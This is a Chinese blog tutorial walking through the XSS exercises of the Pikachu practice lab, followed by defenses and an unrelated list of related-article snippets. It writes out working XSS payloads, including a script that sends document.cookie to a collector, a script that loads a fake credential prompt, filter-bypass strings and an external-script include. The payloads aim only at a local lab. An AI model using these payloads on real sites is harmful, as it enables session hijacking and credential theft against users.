Pikachu靶场-xss详解

2023-11-04


XSS-跨站脚本漏洞目录

跨站脚本漏洞概述

Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:
1.反射性XSS;
2.存储型XSS;
3.DOM型XSS;

XSS漏洞一直是web漏洞中比较危害大的漏洞,在OWASP TOP10的排名一直处于前三的江湖地位。
XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。
因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:
输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
输出转义:根据输出点的位置对输出到前端的内容进行适当转义;
XSS 漏洞可以进行钓鱼攻击、用户cookie获取、前端js挖矿,甚至可以结合浏览器自身漏洞对用户主机进行远程控制

跨站脚本漏洞类型及测试流程

1.跨站脚本漏洞类型
(1)反射型xss
交互的数据一般不会存在数据库,一次性,一般出现在查询页面
(2)存储型xss
交互的数据会存在数据库中,永久性存储,危害较大,一般出现在注册、留言板等页面
(3)Dom型xss
不与后台进行交互,是一种通过dom操作前端代码输出的时候产生的问题,也是属于一次性的。
2.测试流程
要先了解XSS的测试流程,首先我们需要先了解XSS的攻击流程。
最主要的就是因为程序对输入和输出的控制不够严格,导致脚本输入后,在前端被当成有效代码解析执行当作危害。
那么,我们的测试流程也就有思路了
(1)我们首先在目标站点找到输入点,比如查询接口,留言板之类的。
(2)输入一组特殊的字符+唯一识别字符,来看它源码,是否有对应的处理
(3)通过搜索定位到唯一字符后,结合唯一字符前后语法是否可以构成执行js的条件,也就是构造闭合
(4)提交构造的脚本代码以及各种绕过姿势,看看是否能执行,如果行,就说明存在XSS漏洞。

反射型XSS(post&get)

我们通过Picachu靶场来看看,xss到底是什么。
在这里插入图片描述
根据我们前面的测试流程,我们首先输入一些特殊字符和唯一识别字符,我们来看看。
在这里插入图片描述
我们在输入框输入以后,点击提交
在这里插入图片描述
根据我们的思路,来看一下页面的源码
通过输入唯一识别字符,我们能看到我们输入的东西被输出到了P标签中
在这里插入图片描述
我们输入的东西好像被原封不动的输出出来了,那么,假如我们输入一段java script的代码,它还是会原封不动的输出嘛?
我们来试试
我们在输入框输入一段Java Script的代码
在这里插入图片描述
点击提交
在这里插入图片描述
没错,那这就说明存在XSS漏洞,这就是一个反射型的XSS。
我们来看它的源码
在这里插入图片描述
我们输入的东西被原封不动的输出了出来。

存储型XSS

存储型的XSS与反射型的XSS一样,但它是将脚本存在了后台储存起来,构成更持久的危害,也称为永久性xss
话不多说,我们用实例来看
在这里插入图片描述
按照惯例,在留言框中输入特殊字符+唯一识别
在这里插入图片描述
提交之后,发现它会一直存在在那里
在这里插入图片描述
然后,我们接着输入一段Java script的代码,来看看效果如何。
在这里插入图片描述
提交之后,发现弹窗,当我们刷新页面的时候,会发现,会一直弹窗
在这里插入图片描述
我们查看源码,还是没有做任何的处理。

Dom型XSS

在这之前,我们先来了解一下什么是Dom。
DOM 是一项 W3C (World Wide Web Consortium) 标准。

DOM 定义了访问文档的标准:

“W3C 文档对象模型(DOM)是中立于平台和语言的接口,它允许程序和脚本动态地访问、更新文档的内容、结构和样式。”
W3C DOM 标准被分为 3 个不同的部分:

·Core DOM - 所有文档类型的标准模型
·XML DOM - XML 文档的标准模型
·HTML DOM - HTML 文档的标准模型

而html dom是HTML 的标准对象模型和编程接口
换句话来说,HTML DOM 是关于如何获取、更改、添加或删除 HTML 元素的标准

HTML DOM 方法是能够(在 HTML 元素上)执行的动作。
HTML DOM 属性是能够设置或改变的 HTML 元素的值。

也就是说dom就是一个前端接口,不与后台交互

打开我们的Picachu
在DOM型xss中输入框输入1111,点击click me!
在这里插入图片描述
接着我们查看源代码,看看它是怎么处理的
在这里插入图片描述
这段Java script的代码,我们看看是什么意思
首先它使用dom里面的document.getElementById获取到了id=text的值
text 就是下面input 也就是我们输入的内容,。
然后通过dom的操作,将我们输入的内容拼接在了a标签的href属性中
接着a标签会写在id=dom的div标签中

闲话不多说
我们来看看怎么搞
通过分析代码,我们发现我们输入的东西是str,而str又拼接在A标签中,这样的话,我们就有思路了
通过将前面A标签闭合,来构造一个恶意代码
在这里插入图片描述
可以看到它代码就是
在这里插入图片描述

然后我们来闭合它
<a href = ’ 'οnclick=“alert(‘xss’)”> '>what do you see
简单来说就是单引号闭合前面那个单引号
尖括号闭合a标签
中间再来一个弹窗
然后把我们自己写的拿出来
'οnclick=“alert(‘xss’)”>
我们来输入试试
在这里插入图片描述

按照我们之前的思路,我们输入的东西会被拼接到a标签中,然后它不做处理的话,就会执行我们的代码,也就是onclick的话,会弹窗
点击what do you see后
在这里插入图片描述
这样的话,它就是存在DOM型的xss漏洞

我们来看下一个
在这里插入图片描述
同样是在输入框输入1111点击
在这里插入图片描述
它弹出了一段话
我们看看它网页的源代码
在这里插入图片描述
同样是有一段Java script的代码
简单分析一下
它会将URL中传参的内容获取到,然后通过一个url的解码,获取到输入内容并赋值给xss
然后将变量xss写入a标签的href属性中
这样的话,我们的思路和刚刚一样
同样是闭合a标签构造代码

还是输入我们刚刚的脚本
'οnclick=“alert(‘xss’)”>
在这里插入图片描述
点击以后
在这里插入图片描述
这里我们要注意的是
上面url里的东西

http://127.0.0.1/pikachu-master/vul/xss/xss_dom_x.php?text=+%27onclick%3D%22alert%28%27xss%27%29%22%3E#

如果将这段url发送给受害者,那么当他点击连接的时候,就会执行我们构造的恶意的Java script代码了。

大家也可以去试试别的代码

xss-获取cookie

我们先来了解一下get型xss利用
在用户访问xss页面后,触发脚本,然后会返回带有恶意js的页面
然后用户执行脚本,攻击者就会获取到cookie,然后伪造用户登录,造成破坏。

我们首先在下面的管理工具中搭建好要接收的cookie的后台

在这里插入图片描述

要将pkxss单独放在WWW目录下(pkxss是一个可以单独使用的后台)
接着我们修改config.inc.php中数据库的密码,与我们的数据库保持一致
在这里插入图片描述
安装好以后
在这里插入图片描述
有三个功能
在这里插入图片描述
回到网站,我们根据之前的逻辑
当用户访问存在xss漏洞的站点,会触发脚本,返回带有恶意的js的页面
我们就可以执行脚本,获取到用户的cookie
获取到的cookie呢,就在我们的pkxss网站中

这里要说一说这个网站的源码了
在这里插入图片描述
大致就是先用get方式获取cookie
然后将网站重定向到一个新的可信的网站
在这里插入图片描述
这个就是将接受到的cookie进行一个查询输出

回到我们的get型xss中
我们之前做过,如果我们输入一段Java script的alert代码的话,就会进行一个弹窗
那么,我们这次输出一个更加复杂的payload

<script>document.location = 'http://127.0.0.1/pkxss/xcookie/cookie.php?cookie='
+document.cookie;</script>

我们通过获取到cookie并且传到pkxss中

首先将这个文本框长度修改一下
在这里插入图片描述
然后我们输入那段代码
在这里插入图片描述
点击提交之后,发现返回到了127.0.0.1首页
在这里插入图片描述
接着我们来看一下后台
在这里插入图片描述
这样的话,我们就接受到了用户的cookie
接着我们将referer里的url复制,打开一个新的页面
发现它会直接跳到首页,并且在后台也会获取到它的cookie

这就是简单的利用xss获取用户cookie

xss-进行钓鱼

我们之间说过,反射型和存储型一样,只不过一个是一次性的,一个是永久储存的
和反射型一个思路
那么我们就来试试存储型来如何钓鱼

还是打开pikachu,存储型的页面
在这里插入图片描述
在我们pkxss中有一个xfish,里面有三个代码

我们都看一下。
第一个
在这里插入图片描述
简单理解一下,就是会给出一个认证框
然后获取用户输入的数据

第二个
在这里插入图片描述
这个就是获取到用户的信息

第三个
在这里插入图片描述
和之前获取cookie一样,来查看获取到的信息

按照之前的思路,我们来写一个payload

<script src="http://127.0.0.1/pkxss/xfish/fish.php"></script>

在留言版中写下我们的代码
在这里插入图片描述然后点击提交
在这里插入图片描述
它就会提示让用户输入用户名和密码
如果我们输入后点确定的话,后台就会接受到。
在这里插入图片描述

xss盲打

什么是xss的盲打呢
就是说从前端无法判断是否存在xss
只有后台会看到前端输入的东西
我们用pikachu来试试

在这里插入图片描述
我们首先输入数据

然后提交
在这里插入图片描述
我们前端并不会看到

再试试我们之前的Java script代码

在这里插入图片描述
还是没有反应

那我们登录管理员后台看看,点一下提示
在这里插入图片描述

然后我们登录
弹窗了!
在这里插入图片描述
说明后台没有对输入的东西进行判断
管理员登录以后还是会被X
这种危害还是很大的
如果输入一段恶意的代码
就可以获取到管理员的cookie
那么 就可以伪造管理员登录了。

xss的过滤和绕过

我们还是用之前方式打一遍
在这里插入图片描述
提交它
在这里插入图片描述
发现我们输入的script被过滤掉了,说明它后台对script进行了处理
那怎么办
我们尝试一下大小写混合输入script
在这里插入图片描述
发现弹窗了,说明绕过了它的验证
在这里插入图片描述

这里总结一下几种场景

1.前端绕过:
我们可以抓包重放,或者直接修改html前端代码
2.大小写:
有些措施会过滤掉你输入的代码,比如正则匹配
或者用一些查找的函数找到你的恶意代码
可以尝试大小写混合输入
3.拼凑:
有些后台会把script这些东西进行替换,但有些逻辑只会拼凑一次
比如:

<sc<script>ript>alert('xss')</scr<script>ipt>

他会把中间的script给替换掉
但是剩下的依然是script
4.注释干扰:
还是举个例子

<scr<!?-test>ipt>alert('xss')</scr<!?-test>ipt>

在前端的时候,被注释掉了
但是后台不认识它,不会认为它是script的标签,从而绕过
5:编码
后台会对特殊字符过滤,但是不一定认识编码后的东西
但是在编码的时候,要注意编码在前端输出的时候能被正常翻译,否则不行。

xss-htmlspecialchars

htmlspecialchars函数是把预定义的字符转化为html实体

我们依然是之前的方法,特殊字符、唯一识别字符
在这里插入图片描述
提交之后
在这里插入图片描述
接着 我们看看源码

在这里插入图片描述
对一些特殊字符进行了处理,但是常规的specialchars函数不对单引号做出了
我们来写一个payload
在这里插入图片描述

提交之后 点击

在这里插入图片描述

xss输出在href和js中的案例

href中:
在这里插入图片描述
我们还是之前的逻辑,以此测试一遍
接着就是Javascript代码
在这里插入图片描述
还是不弹窗,我们来分析一下源码

在这里插入图片描述
之前的specialchars方法,这次还把单引号也给处理了
那怎么办呢
其实,输出在a标签的href属性里面,可以使用javascript协议来执行js
我们来执行一下这个payload
在这里插入图片描述
提交之后,点击下面的链接

在这里插入图片描述
弹窗成功!
那怎么预防呢,我们可以对输入的东西做要求
例如只输入http之类的 然后再用specialchars处理
js中:

在这里插入图片描述
提交
在这里插入图片描述
接受是在script中

我们来构造一个闭合

'</script><script>alert( 'xss')</script>

在这里插入图片描述
提交之后
在这里插入图片描述
弹窗成功!

这里讲输入动态的生成到了js中,形成xss
Javascript里面是不会对tag和字符实体进行解释的,所以需要进行js转义

讲这个例子主要是为了让你明白,输出点在js中的xss问题,应该怎么修?
这里如果进行html的实体编码,虽然可以解决XSS的问题,但是实体编码后的内容,在JS里面不会进行翻译,这样会导致前端的功能无法使用。
所以在JS的输出点应该使用\对特殊字符进行转义

xss的防范措施

总原则:
输入做过滤,输出做转义

过滤:比如对输入的东西做要求,如输入手机号,只能输入数字
转义∶所有输出到前端的数据都根据输出点进行转义,比如输出到html中进行html实体转义,输入到JS里面的进行js转义。

常用payload

<script>alert(1)</script> #最普通的xss
<script>alert(document.cookie)</script> #获取cookie
<a href="javascript:alert('xss')">xss</a> #a链接的xss
<script src='http://baidu.com/xss.js'></script> # 外部攻击代码
<img src=x onerror=alert(1)> #加载图形失败执行
<iframe onload=alert('xss')> #框架
<svg onload=alert(1)>
<video onloadstart=alert(1) src="/media/hack-the-planet.mp4" />
<body onload=alert(1)>
<style onload=alert(1)></style>
<input onmouseover=alert(1)>
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

Pikachu靶场-xss详解 的相关文章

  • Codeigniter - 基于帖子禁用 XSS 过滤

    我正在尝试在网站后面设置一个 CMS 但是每当发布数据时 a href 其中帖子数据被废弃 input gt post content true 打开它 但如何关闭它 感谢大家 PVS 如果您想更改默认行为post 方法 您可以扩展核心输入
  • 内网安全:隧道技术详解

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一 CS反向连接上线 拿下Win2008 一 使用转发代理上线创建监听器 二 上传后门执行上线 隧道技术 SMB协议 SMB协议介绍
  • 【网络安全】——区块链安全和共识机制

    区块链安全和共识机制 摘要 区块链技术作为一种分布式去中心化的技术 在无需第三方的情况下 使得未建立信任的交易双方可以达成交易 因此 区块链技术近年来也在金融 医疗 能源等多个行业得到了快速发展 然而 区块链为无信任的网络提供保障的同时 也
  • 网络安全(黑客)自学启蒙

    一 什么是网络安全 网络安全是一种综合性的概念 涵盖了保护计算机系统 网络基础设施和数据免受未经授权的访问 攻击 损害或盗窃的一系列措施和技术 经常听到的 红队 渗透测试 等就是研究攻击技术 而 蓝队 安全运营 安全运维 则研究防御技术 作
  • 为什么我强烈推荐大学生打CTF!

    前言 写这个文章是因为我很多粉丝都是学生 经常有人问 感觉大一第一个学期忙忙碌碌的过去了 啥都会一点 但是自己很难系统的学习到整个知识体系 很迷茫 想知道要如何高效学习 这篇文章我主要就围绕两点 减少那些罗里吧嗦的废话 直接上干货 CTF如
  • 为什么这么多人自学黑客,但没过多久就放弃了(掌握正确的网络安全学习路线很重要)

    网络安全是一个 不断发展和演变 的领域 以下是一个 网络安全学习路线规划 旨在帮助初学者快速入门和提高自己的技能 基础知识 网络安全的 基础知识 包括 网络结构 操作系统 编程语言 等方面的知识 学习这些基础知识对理解网络安全的原理和技术至
  • 【方法】如何把Excel“只读方式”变成可直接编辑?

    Excel在 只读方式 下 编辑后是无法直接保存原文件的 那如何可以直接编辑原文件呢 下面来一起看看看吧 如果Excel设置的是无密码的 只读方式 那在打开Excel后 会出现对话框 提示 是否以只读方式打开 如果想直接编辑文件 选择 否
  • 【安全】使用docker安装Nessus

    目录 一 准备docker环境服务器 略 二 安装 2 1 搜索镜像 2 2 拉取镜像 2 3 启动镜像 三 离线更新插件 3 1 获取challenge 3 2 官方注册获取激活码 3 3 使用challenge码和激活码获取插件下载地址
  • 如何使用 HTML/PHP 防止 XSS?

    我该如何预防XSS https en wikipedia org wiki Cross site scripting 跨站点脚本 仅使用 HTML 和 PHP 我已经看过很多关于这个主题的其他帖子 但我还没有找到一篇文章清楚 简洁地说明如何
  • 在Golang中实现XSS防护

    我正在使用 Golang 构建 API Rest 我有一个包含很多字段 超过 100 个 的结构 因此我使用以下命令将来自客户端的值分配给该结构gorilla schema效果很好 现在 我想避免用户在任何字符串字段中插入 Javascri
  • 将准备好的语句包装在函数中[重复]

    这个问题在这里已经有答案了 我一直在阅读有关 SQL 注入的文章 并决定修改我的代码以防止 SQL 注入 例如 我有一个输入 我将其值插入到数据库中 最初 我对注射的防范是这样的 function test input data data
  • 使用 Spring MVC 框架清理用户输入

    我正在使用 spring mvc 框架开发 Web 应用程序 我想知道是否有任何最好的方法来清理用户输入或通用方法来清理 springs 中的所有用户输入以避免 XSS 和 Sql 注入攻击 您可以使用Filters在 Spring 框架中
  • ValidateRequest 错误还是 SQL Server Bug?

    我正在读这个article http software security sans org blog 2011 07 22 bypassing validaterequest in asp net 它说 该字符用值 uff1c 表示 如果将
  • 如何使用 Struts 预防 XSS 漏洞

    我们需要在 Struts 应用程序中添加反 XSS 支持 最具体地说 架构师要求所有用户输入在存储到数据库之前必须进行 清理 由于我不想重新发明方轮 我可以使用哪个 Java 库来实现此目的 以及把它放在哪里 理想情况下 它应该是可配置的
  • 谁能解释一下这些 XSS 测试字符串吗?

    最近我发现了这个关于 XSS 和 Web 应用程序安全的教程 gt https www owasp org index php XSS Filter Evasion Cheat Sheet XSS Locator https www owa
  • https 安全 cookie 是否可以防止 XSS 攻击?

    https 连接是否可以保护 cookie 并防止 XSS 攻击 我有一个简单的博客 允许用户输入 JavaScript 代码作为输入 我希望允许用户输入 Javascript 同时仍然防止 XSS 攻击和 cookie 窃取 https
  • 使用内容安全策略防止 Internet Explorer 11 上的内联 JavaScript

    是否可以使用 ASP NET WebForm 上的 CSP 来阻止 Internet Explorer 11 上的内联 JavaScript 我知道 IE 11 不支持内容安全策略级别 2 但它支持级别 1 0 我尝试了很多方法 但没有明确
  • 发布后忽略基本标签

    在 Chrome 上我收到错误Refused to execute a JavaScript script Source code of script found within request 在发布包含域名的数据后 另请注意任一页面上都缺
  • HTML-Entity 转义以防止 XSS

    我有一些用户输入 在我的代码中 我确保对以下符号进行转义 gt amp lt gt lt gt gt gt OWASP https www owasp org index php XSS 28Cross Site Scripting 29
  • 防止语言环境文件中的 HTML 字符实体被 Rails3 xss 保护破坏

    我们正在构建一个应用程序 这是我们第一个使用 Rails 3 的应用程序 并且我们必须从一开始就构建 I18n 作为完美主义者 我们希望在我们的视图中使用真正的排版 破折号 卷曲引号 省略号等 这意味着在我们的 locales xx yml

随机推荐

  • 如何在项目中使用kafka?

    1 如何在项目中使用kafka 1 1 因为kafka的使用依赖于zookeeper https mp weixin qq com s geR3pDw Yjhmu8KMsXQosg在kafka v2 8版本后将zookeeper也集成在了服
  • 【系统篇 / 域】❀ 06. Windows10 加入域 ❀ Windows Server 2016

    简介 众所周知 Windows Server 2016 与其它版本不同的地方就是支持 Windows10 加入域服务了 修改 DNS Windows10 加入域之前 需要把网卡的DNS指向域服务器 在Windows10系统中 鼠标右击右下角
  • Elasticsearch自定义评分的多种方法

    Elasticsearch自定义评分的多种方法 在大数据领域 Elasticsearch是一个广泛使用的开源搜索和分析引擎 它提供了强大的搜索功能 并支持通过自定义评分机制来调整搜索结果的排序 在本文中 我们将探讨Elasticsearch
  • 导师总结的最全python核心知识点汇总笔记,260页最完整版。

    python学习简单 但完全掌握还是会有许多重难点 本次收集了python从入门到精通的所有重难知识点详细梳理讲解 并附有多种思路与方法 配合案例可以更快速的让你掌握相关知识节点 这份笔记由导师亲自汇总整理编辑 共计260页内容 堪称经典
  • php写layui上传接口,layui 富文本图片上传接口与普通按钮 文件上传接口的例子

    富文本 图片上传 html js 记得之前引入layui js layui use layedit function var layedit layui layedit layedit set uploadImage url url ind
  • MySQL-插入数据(insert into,replace into)

    插入数据的方法 mysql中常用的三种插入数据的语句 insert into 正常的插入数据 插入数据的时候会检查主键或者唯一索引 如果出现重复就会报错 replace into 表示插入并替换数据 若表中有primary key或者uni
  • 跨境电商----系统构建前了解

    20210529 在与国外朋友聊到跨境电商这个话题时候 思绪回到好几年前 那时候雪花纷飞 中国跨境电商刚刚高速发展时期 我记得 北京的夏天 有个穿着背心的小年轻 横穿在5 6环 中国跨境电商高速情况下 规模 产业规模 都在变化 看到C2C
  • vue双向数据绑定是如何实现的?

    Vue中的双向数据绑定主要是通过数据劫持和发布订阅模式来实现的 数据劫持 Vue通过使用Object defineProperty 方法来对data对象中的属性进行劫持 从而实现对数据的双向绑定 具体实现方式为 1 在Vue实例化时 将da
  • 网页视频下载mp4格式到本地

    发现个网页视频地址下载保存为mp4格式的资源 分享给大家 git下载地址 https gitee com tiankf mp4 CSDN下载地址 MP4下载到保存到本地资源 CSDN文库 使用方式 代码如下
  • html2canvas将Html5转换为图片并下载到本地,纯JS实现

    首先引入html2canvas js 然后是文件本地保存并重命名的一段函数 最后事件函数处理就可以了 在本地进行文件保存 param String data 要保存到本地的图片数据 param String filename 文件名 var
  • 关于CADC数据集的处理笔记

    简要介绍 数据集 Canadian Adverse Driving Conditions Dataset CADC 是全球首个针对寒冷环境的自动驾驶数据集 其内包含 56 000 张相机图像 7 000 次 LiDAR 扫描 75 个场景
  • shell常用命令

    目录 常用命令 目录信息查看命令 ls 目录切换命令 cd 当前路径显示命令 pwd 系统信息查看命令 uname 清屏命令 clear 系统帮助命令 man 系统重启命令 reboot 系统关闭命令 poweroff 查看和修改系统时间命
  • 如何提供一个可信的AB测试解决方案

    本文以履约场景下的具体实践为背景 介绍如何提供一个可信赖的AB测试解决方案 一方面从实验方法的角度论述实验过程中容易被忽视的统计陷阱 给出具体的解决方案 一方面从平台建设角度论述针对业务场景和对应约束制定实验方案提供给用户 而不只是功能和方
  • 运营商大数据实时获取精准数据

    随着大数据技术的快速发展和完善 出现了一种新的扩张方式 互联网大数据的精准扩张 如果没有一个好的渠道来获得顾客 这就像准备热情地做饭 但当饭吃完后 人们只能饿了 今天的消费者已经从最早的线下消费逐渐过渡到互联网消费 再到现在的移动互联网消费
  • openGL之API学习(一八零)POINTS LINES TRIANGLES QUADS 绘图顺序规则

    默认每一个图形的绘图方向是相同的 要么逆时针 默认方向 要么顺时针 1 GL TRIANGLES 是以每三个顶点绘制一个三角形 第一个三角形使用顶点v0 v1 v2 第二个使用v3 v4 v5 以此类推 如果顶点的个数n不是3的倍数 那么最
  • 2. 特征缩放(归一化)

    特征缩放 为了消除数据特征之间的量纲影响 我们需要对特征进行归一化处理 使得不同指标之间具有可比性 例如 分析一个人的身高和体重对健康的影响 如果使用 米 m 和 千克 kg 作为单位 那么分析出来的结果显然会倾向于数值差别比较大的体重特征
  • python进行回归分析(1)

    数据来源 R软件自带的包alr4中的数据集 library alr4 data lt UN11 write table data C Users admin Desktop 数据分析 a csv row names FALSE col na
  • Spring系列之aop概念详解

    本文主要内容 什么是Aop Spring AOP中重要的一些概念详解 Spring AOP 硬编码实现 什么是AOP 先看一下传统程序的流程 比如银行系统会有一个取款流程 我们可以把方框里的流程合为一个 另外系统还会有一个查询余额流程 我们
  • java异常和日志处理规范

    转载自 V型知识库 一 java异常处理规范 转自 http www vxzsk com 521 html 1 强制 不要捕获 Java 类库中定义的继承自 RuntimeException 的运行时异常类 如 IndexOutOfBoun
  • Pikachu靶场-xss详解

    Picachu靶场 xss 跨站脚本漏洞概述 跨站脚本漏洞类型及测试流程 反射型XSS post get 存储型XSS Dom型XSS xss 获取cookie xss 进行钓鱼 xss盲打 xss的过滤和绕过 xss htmlspecia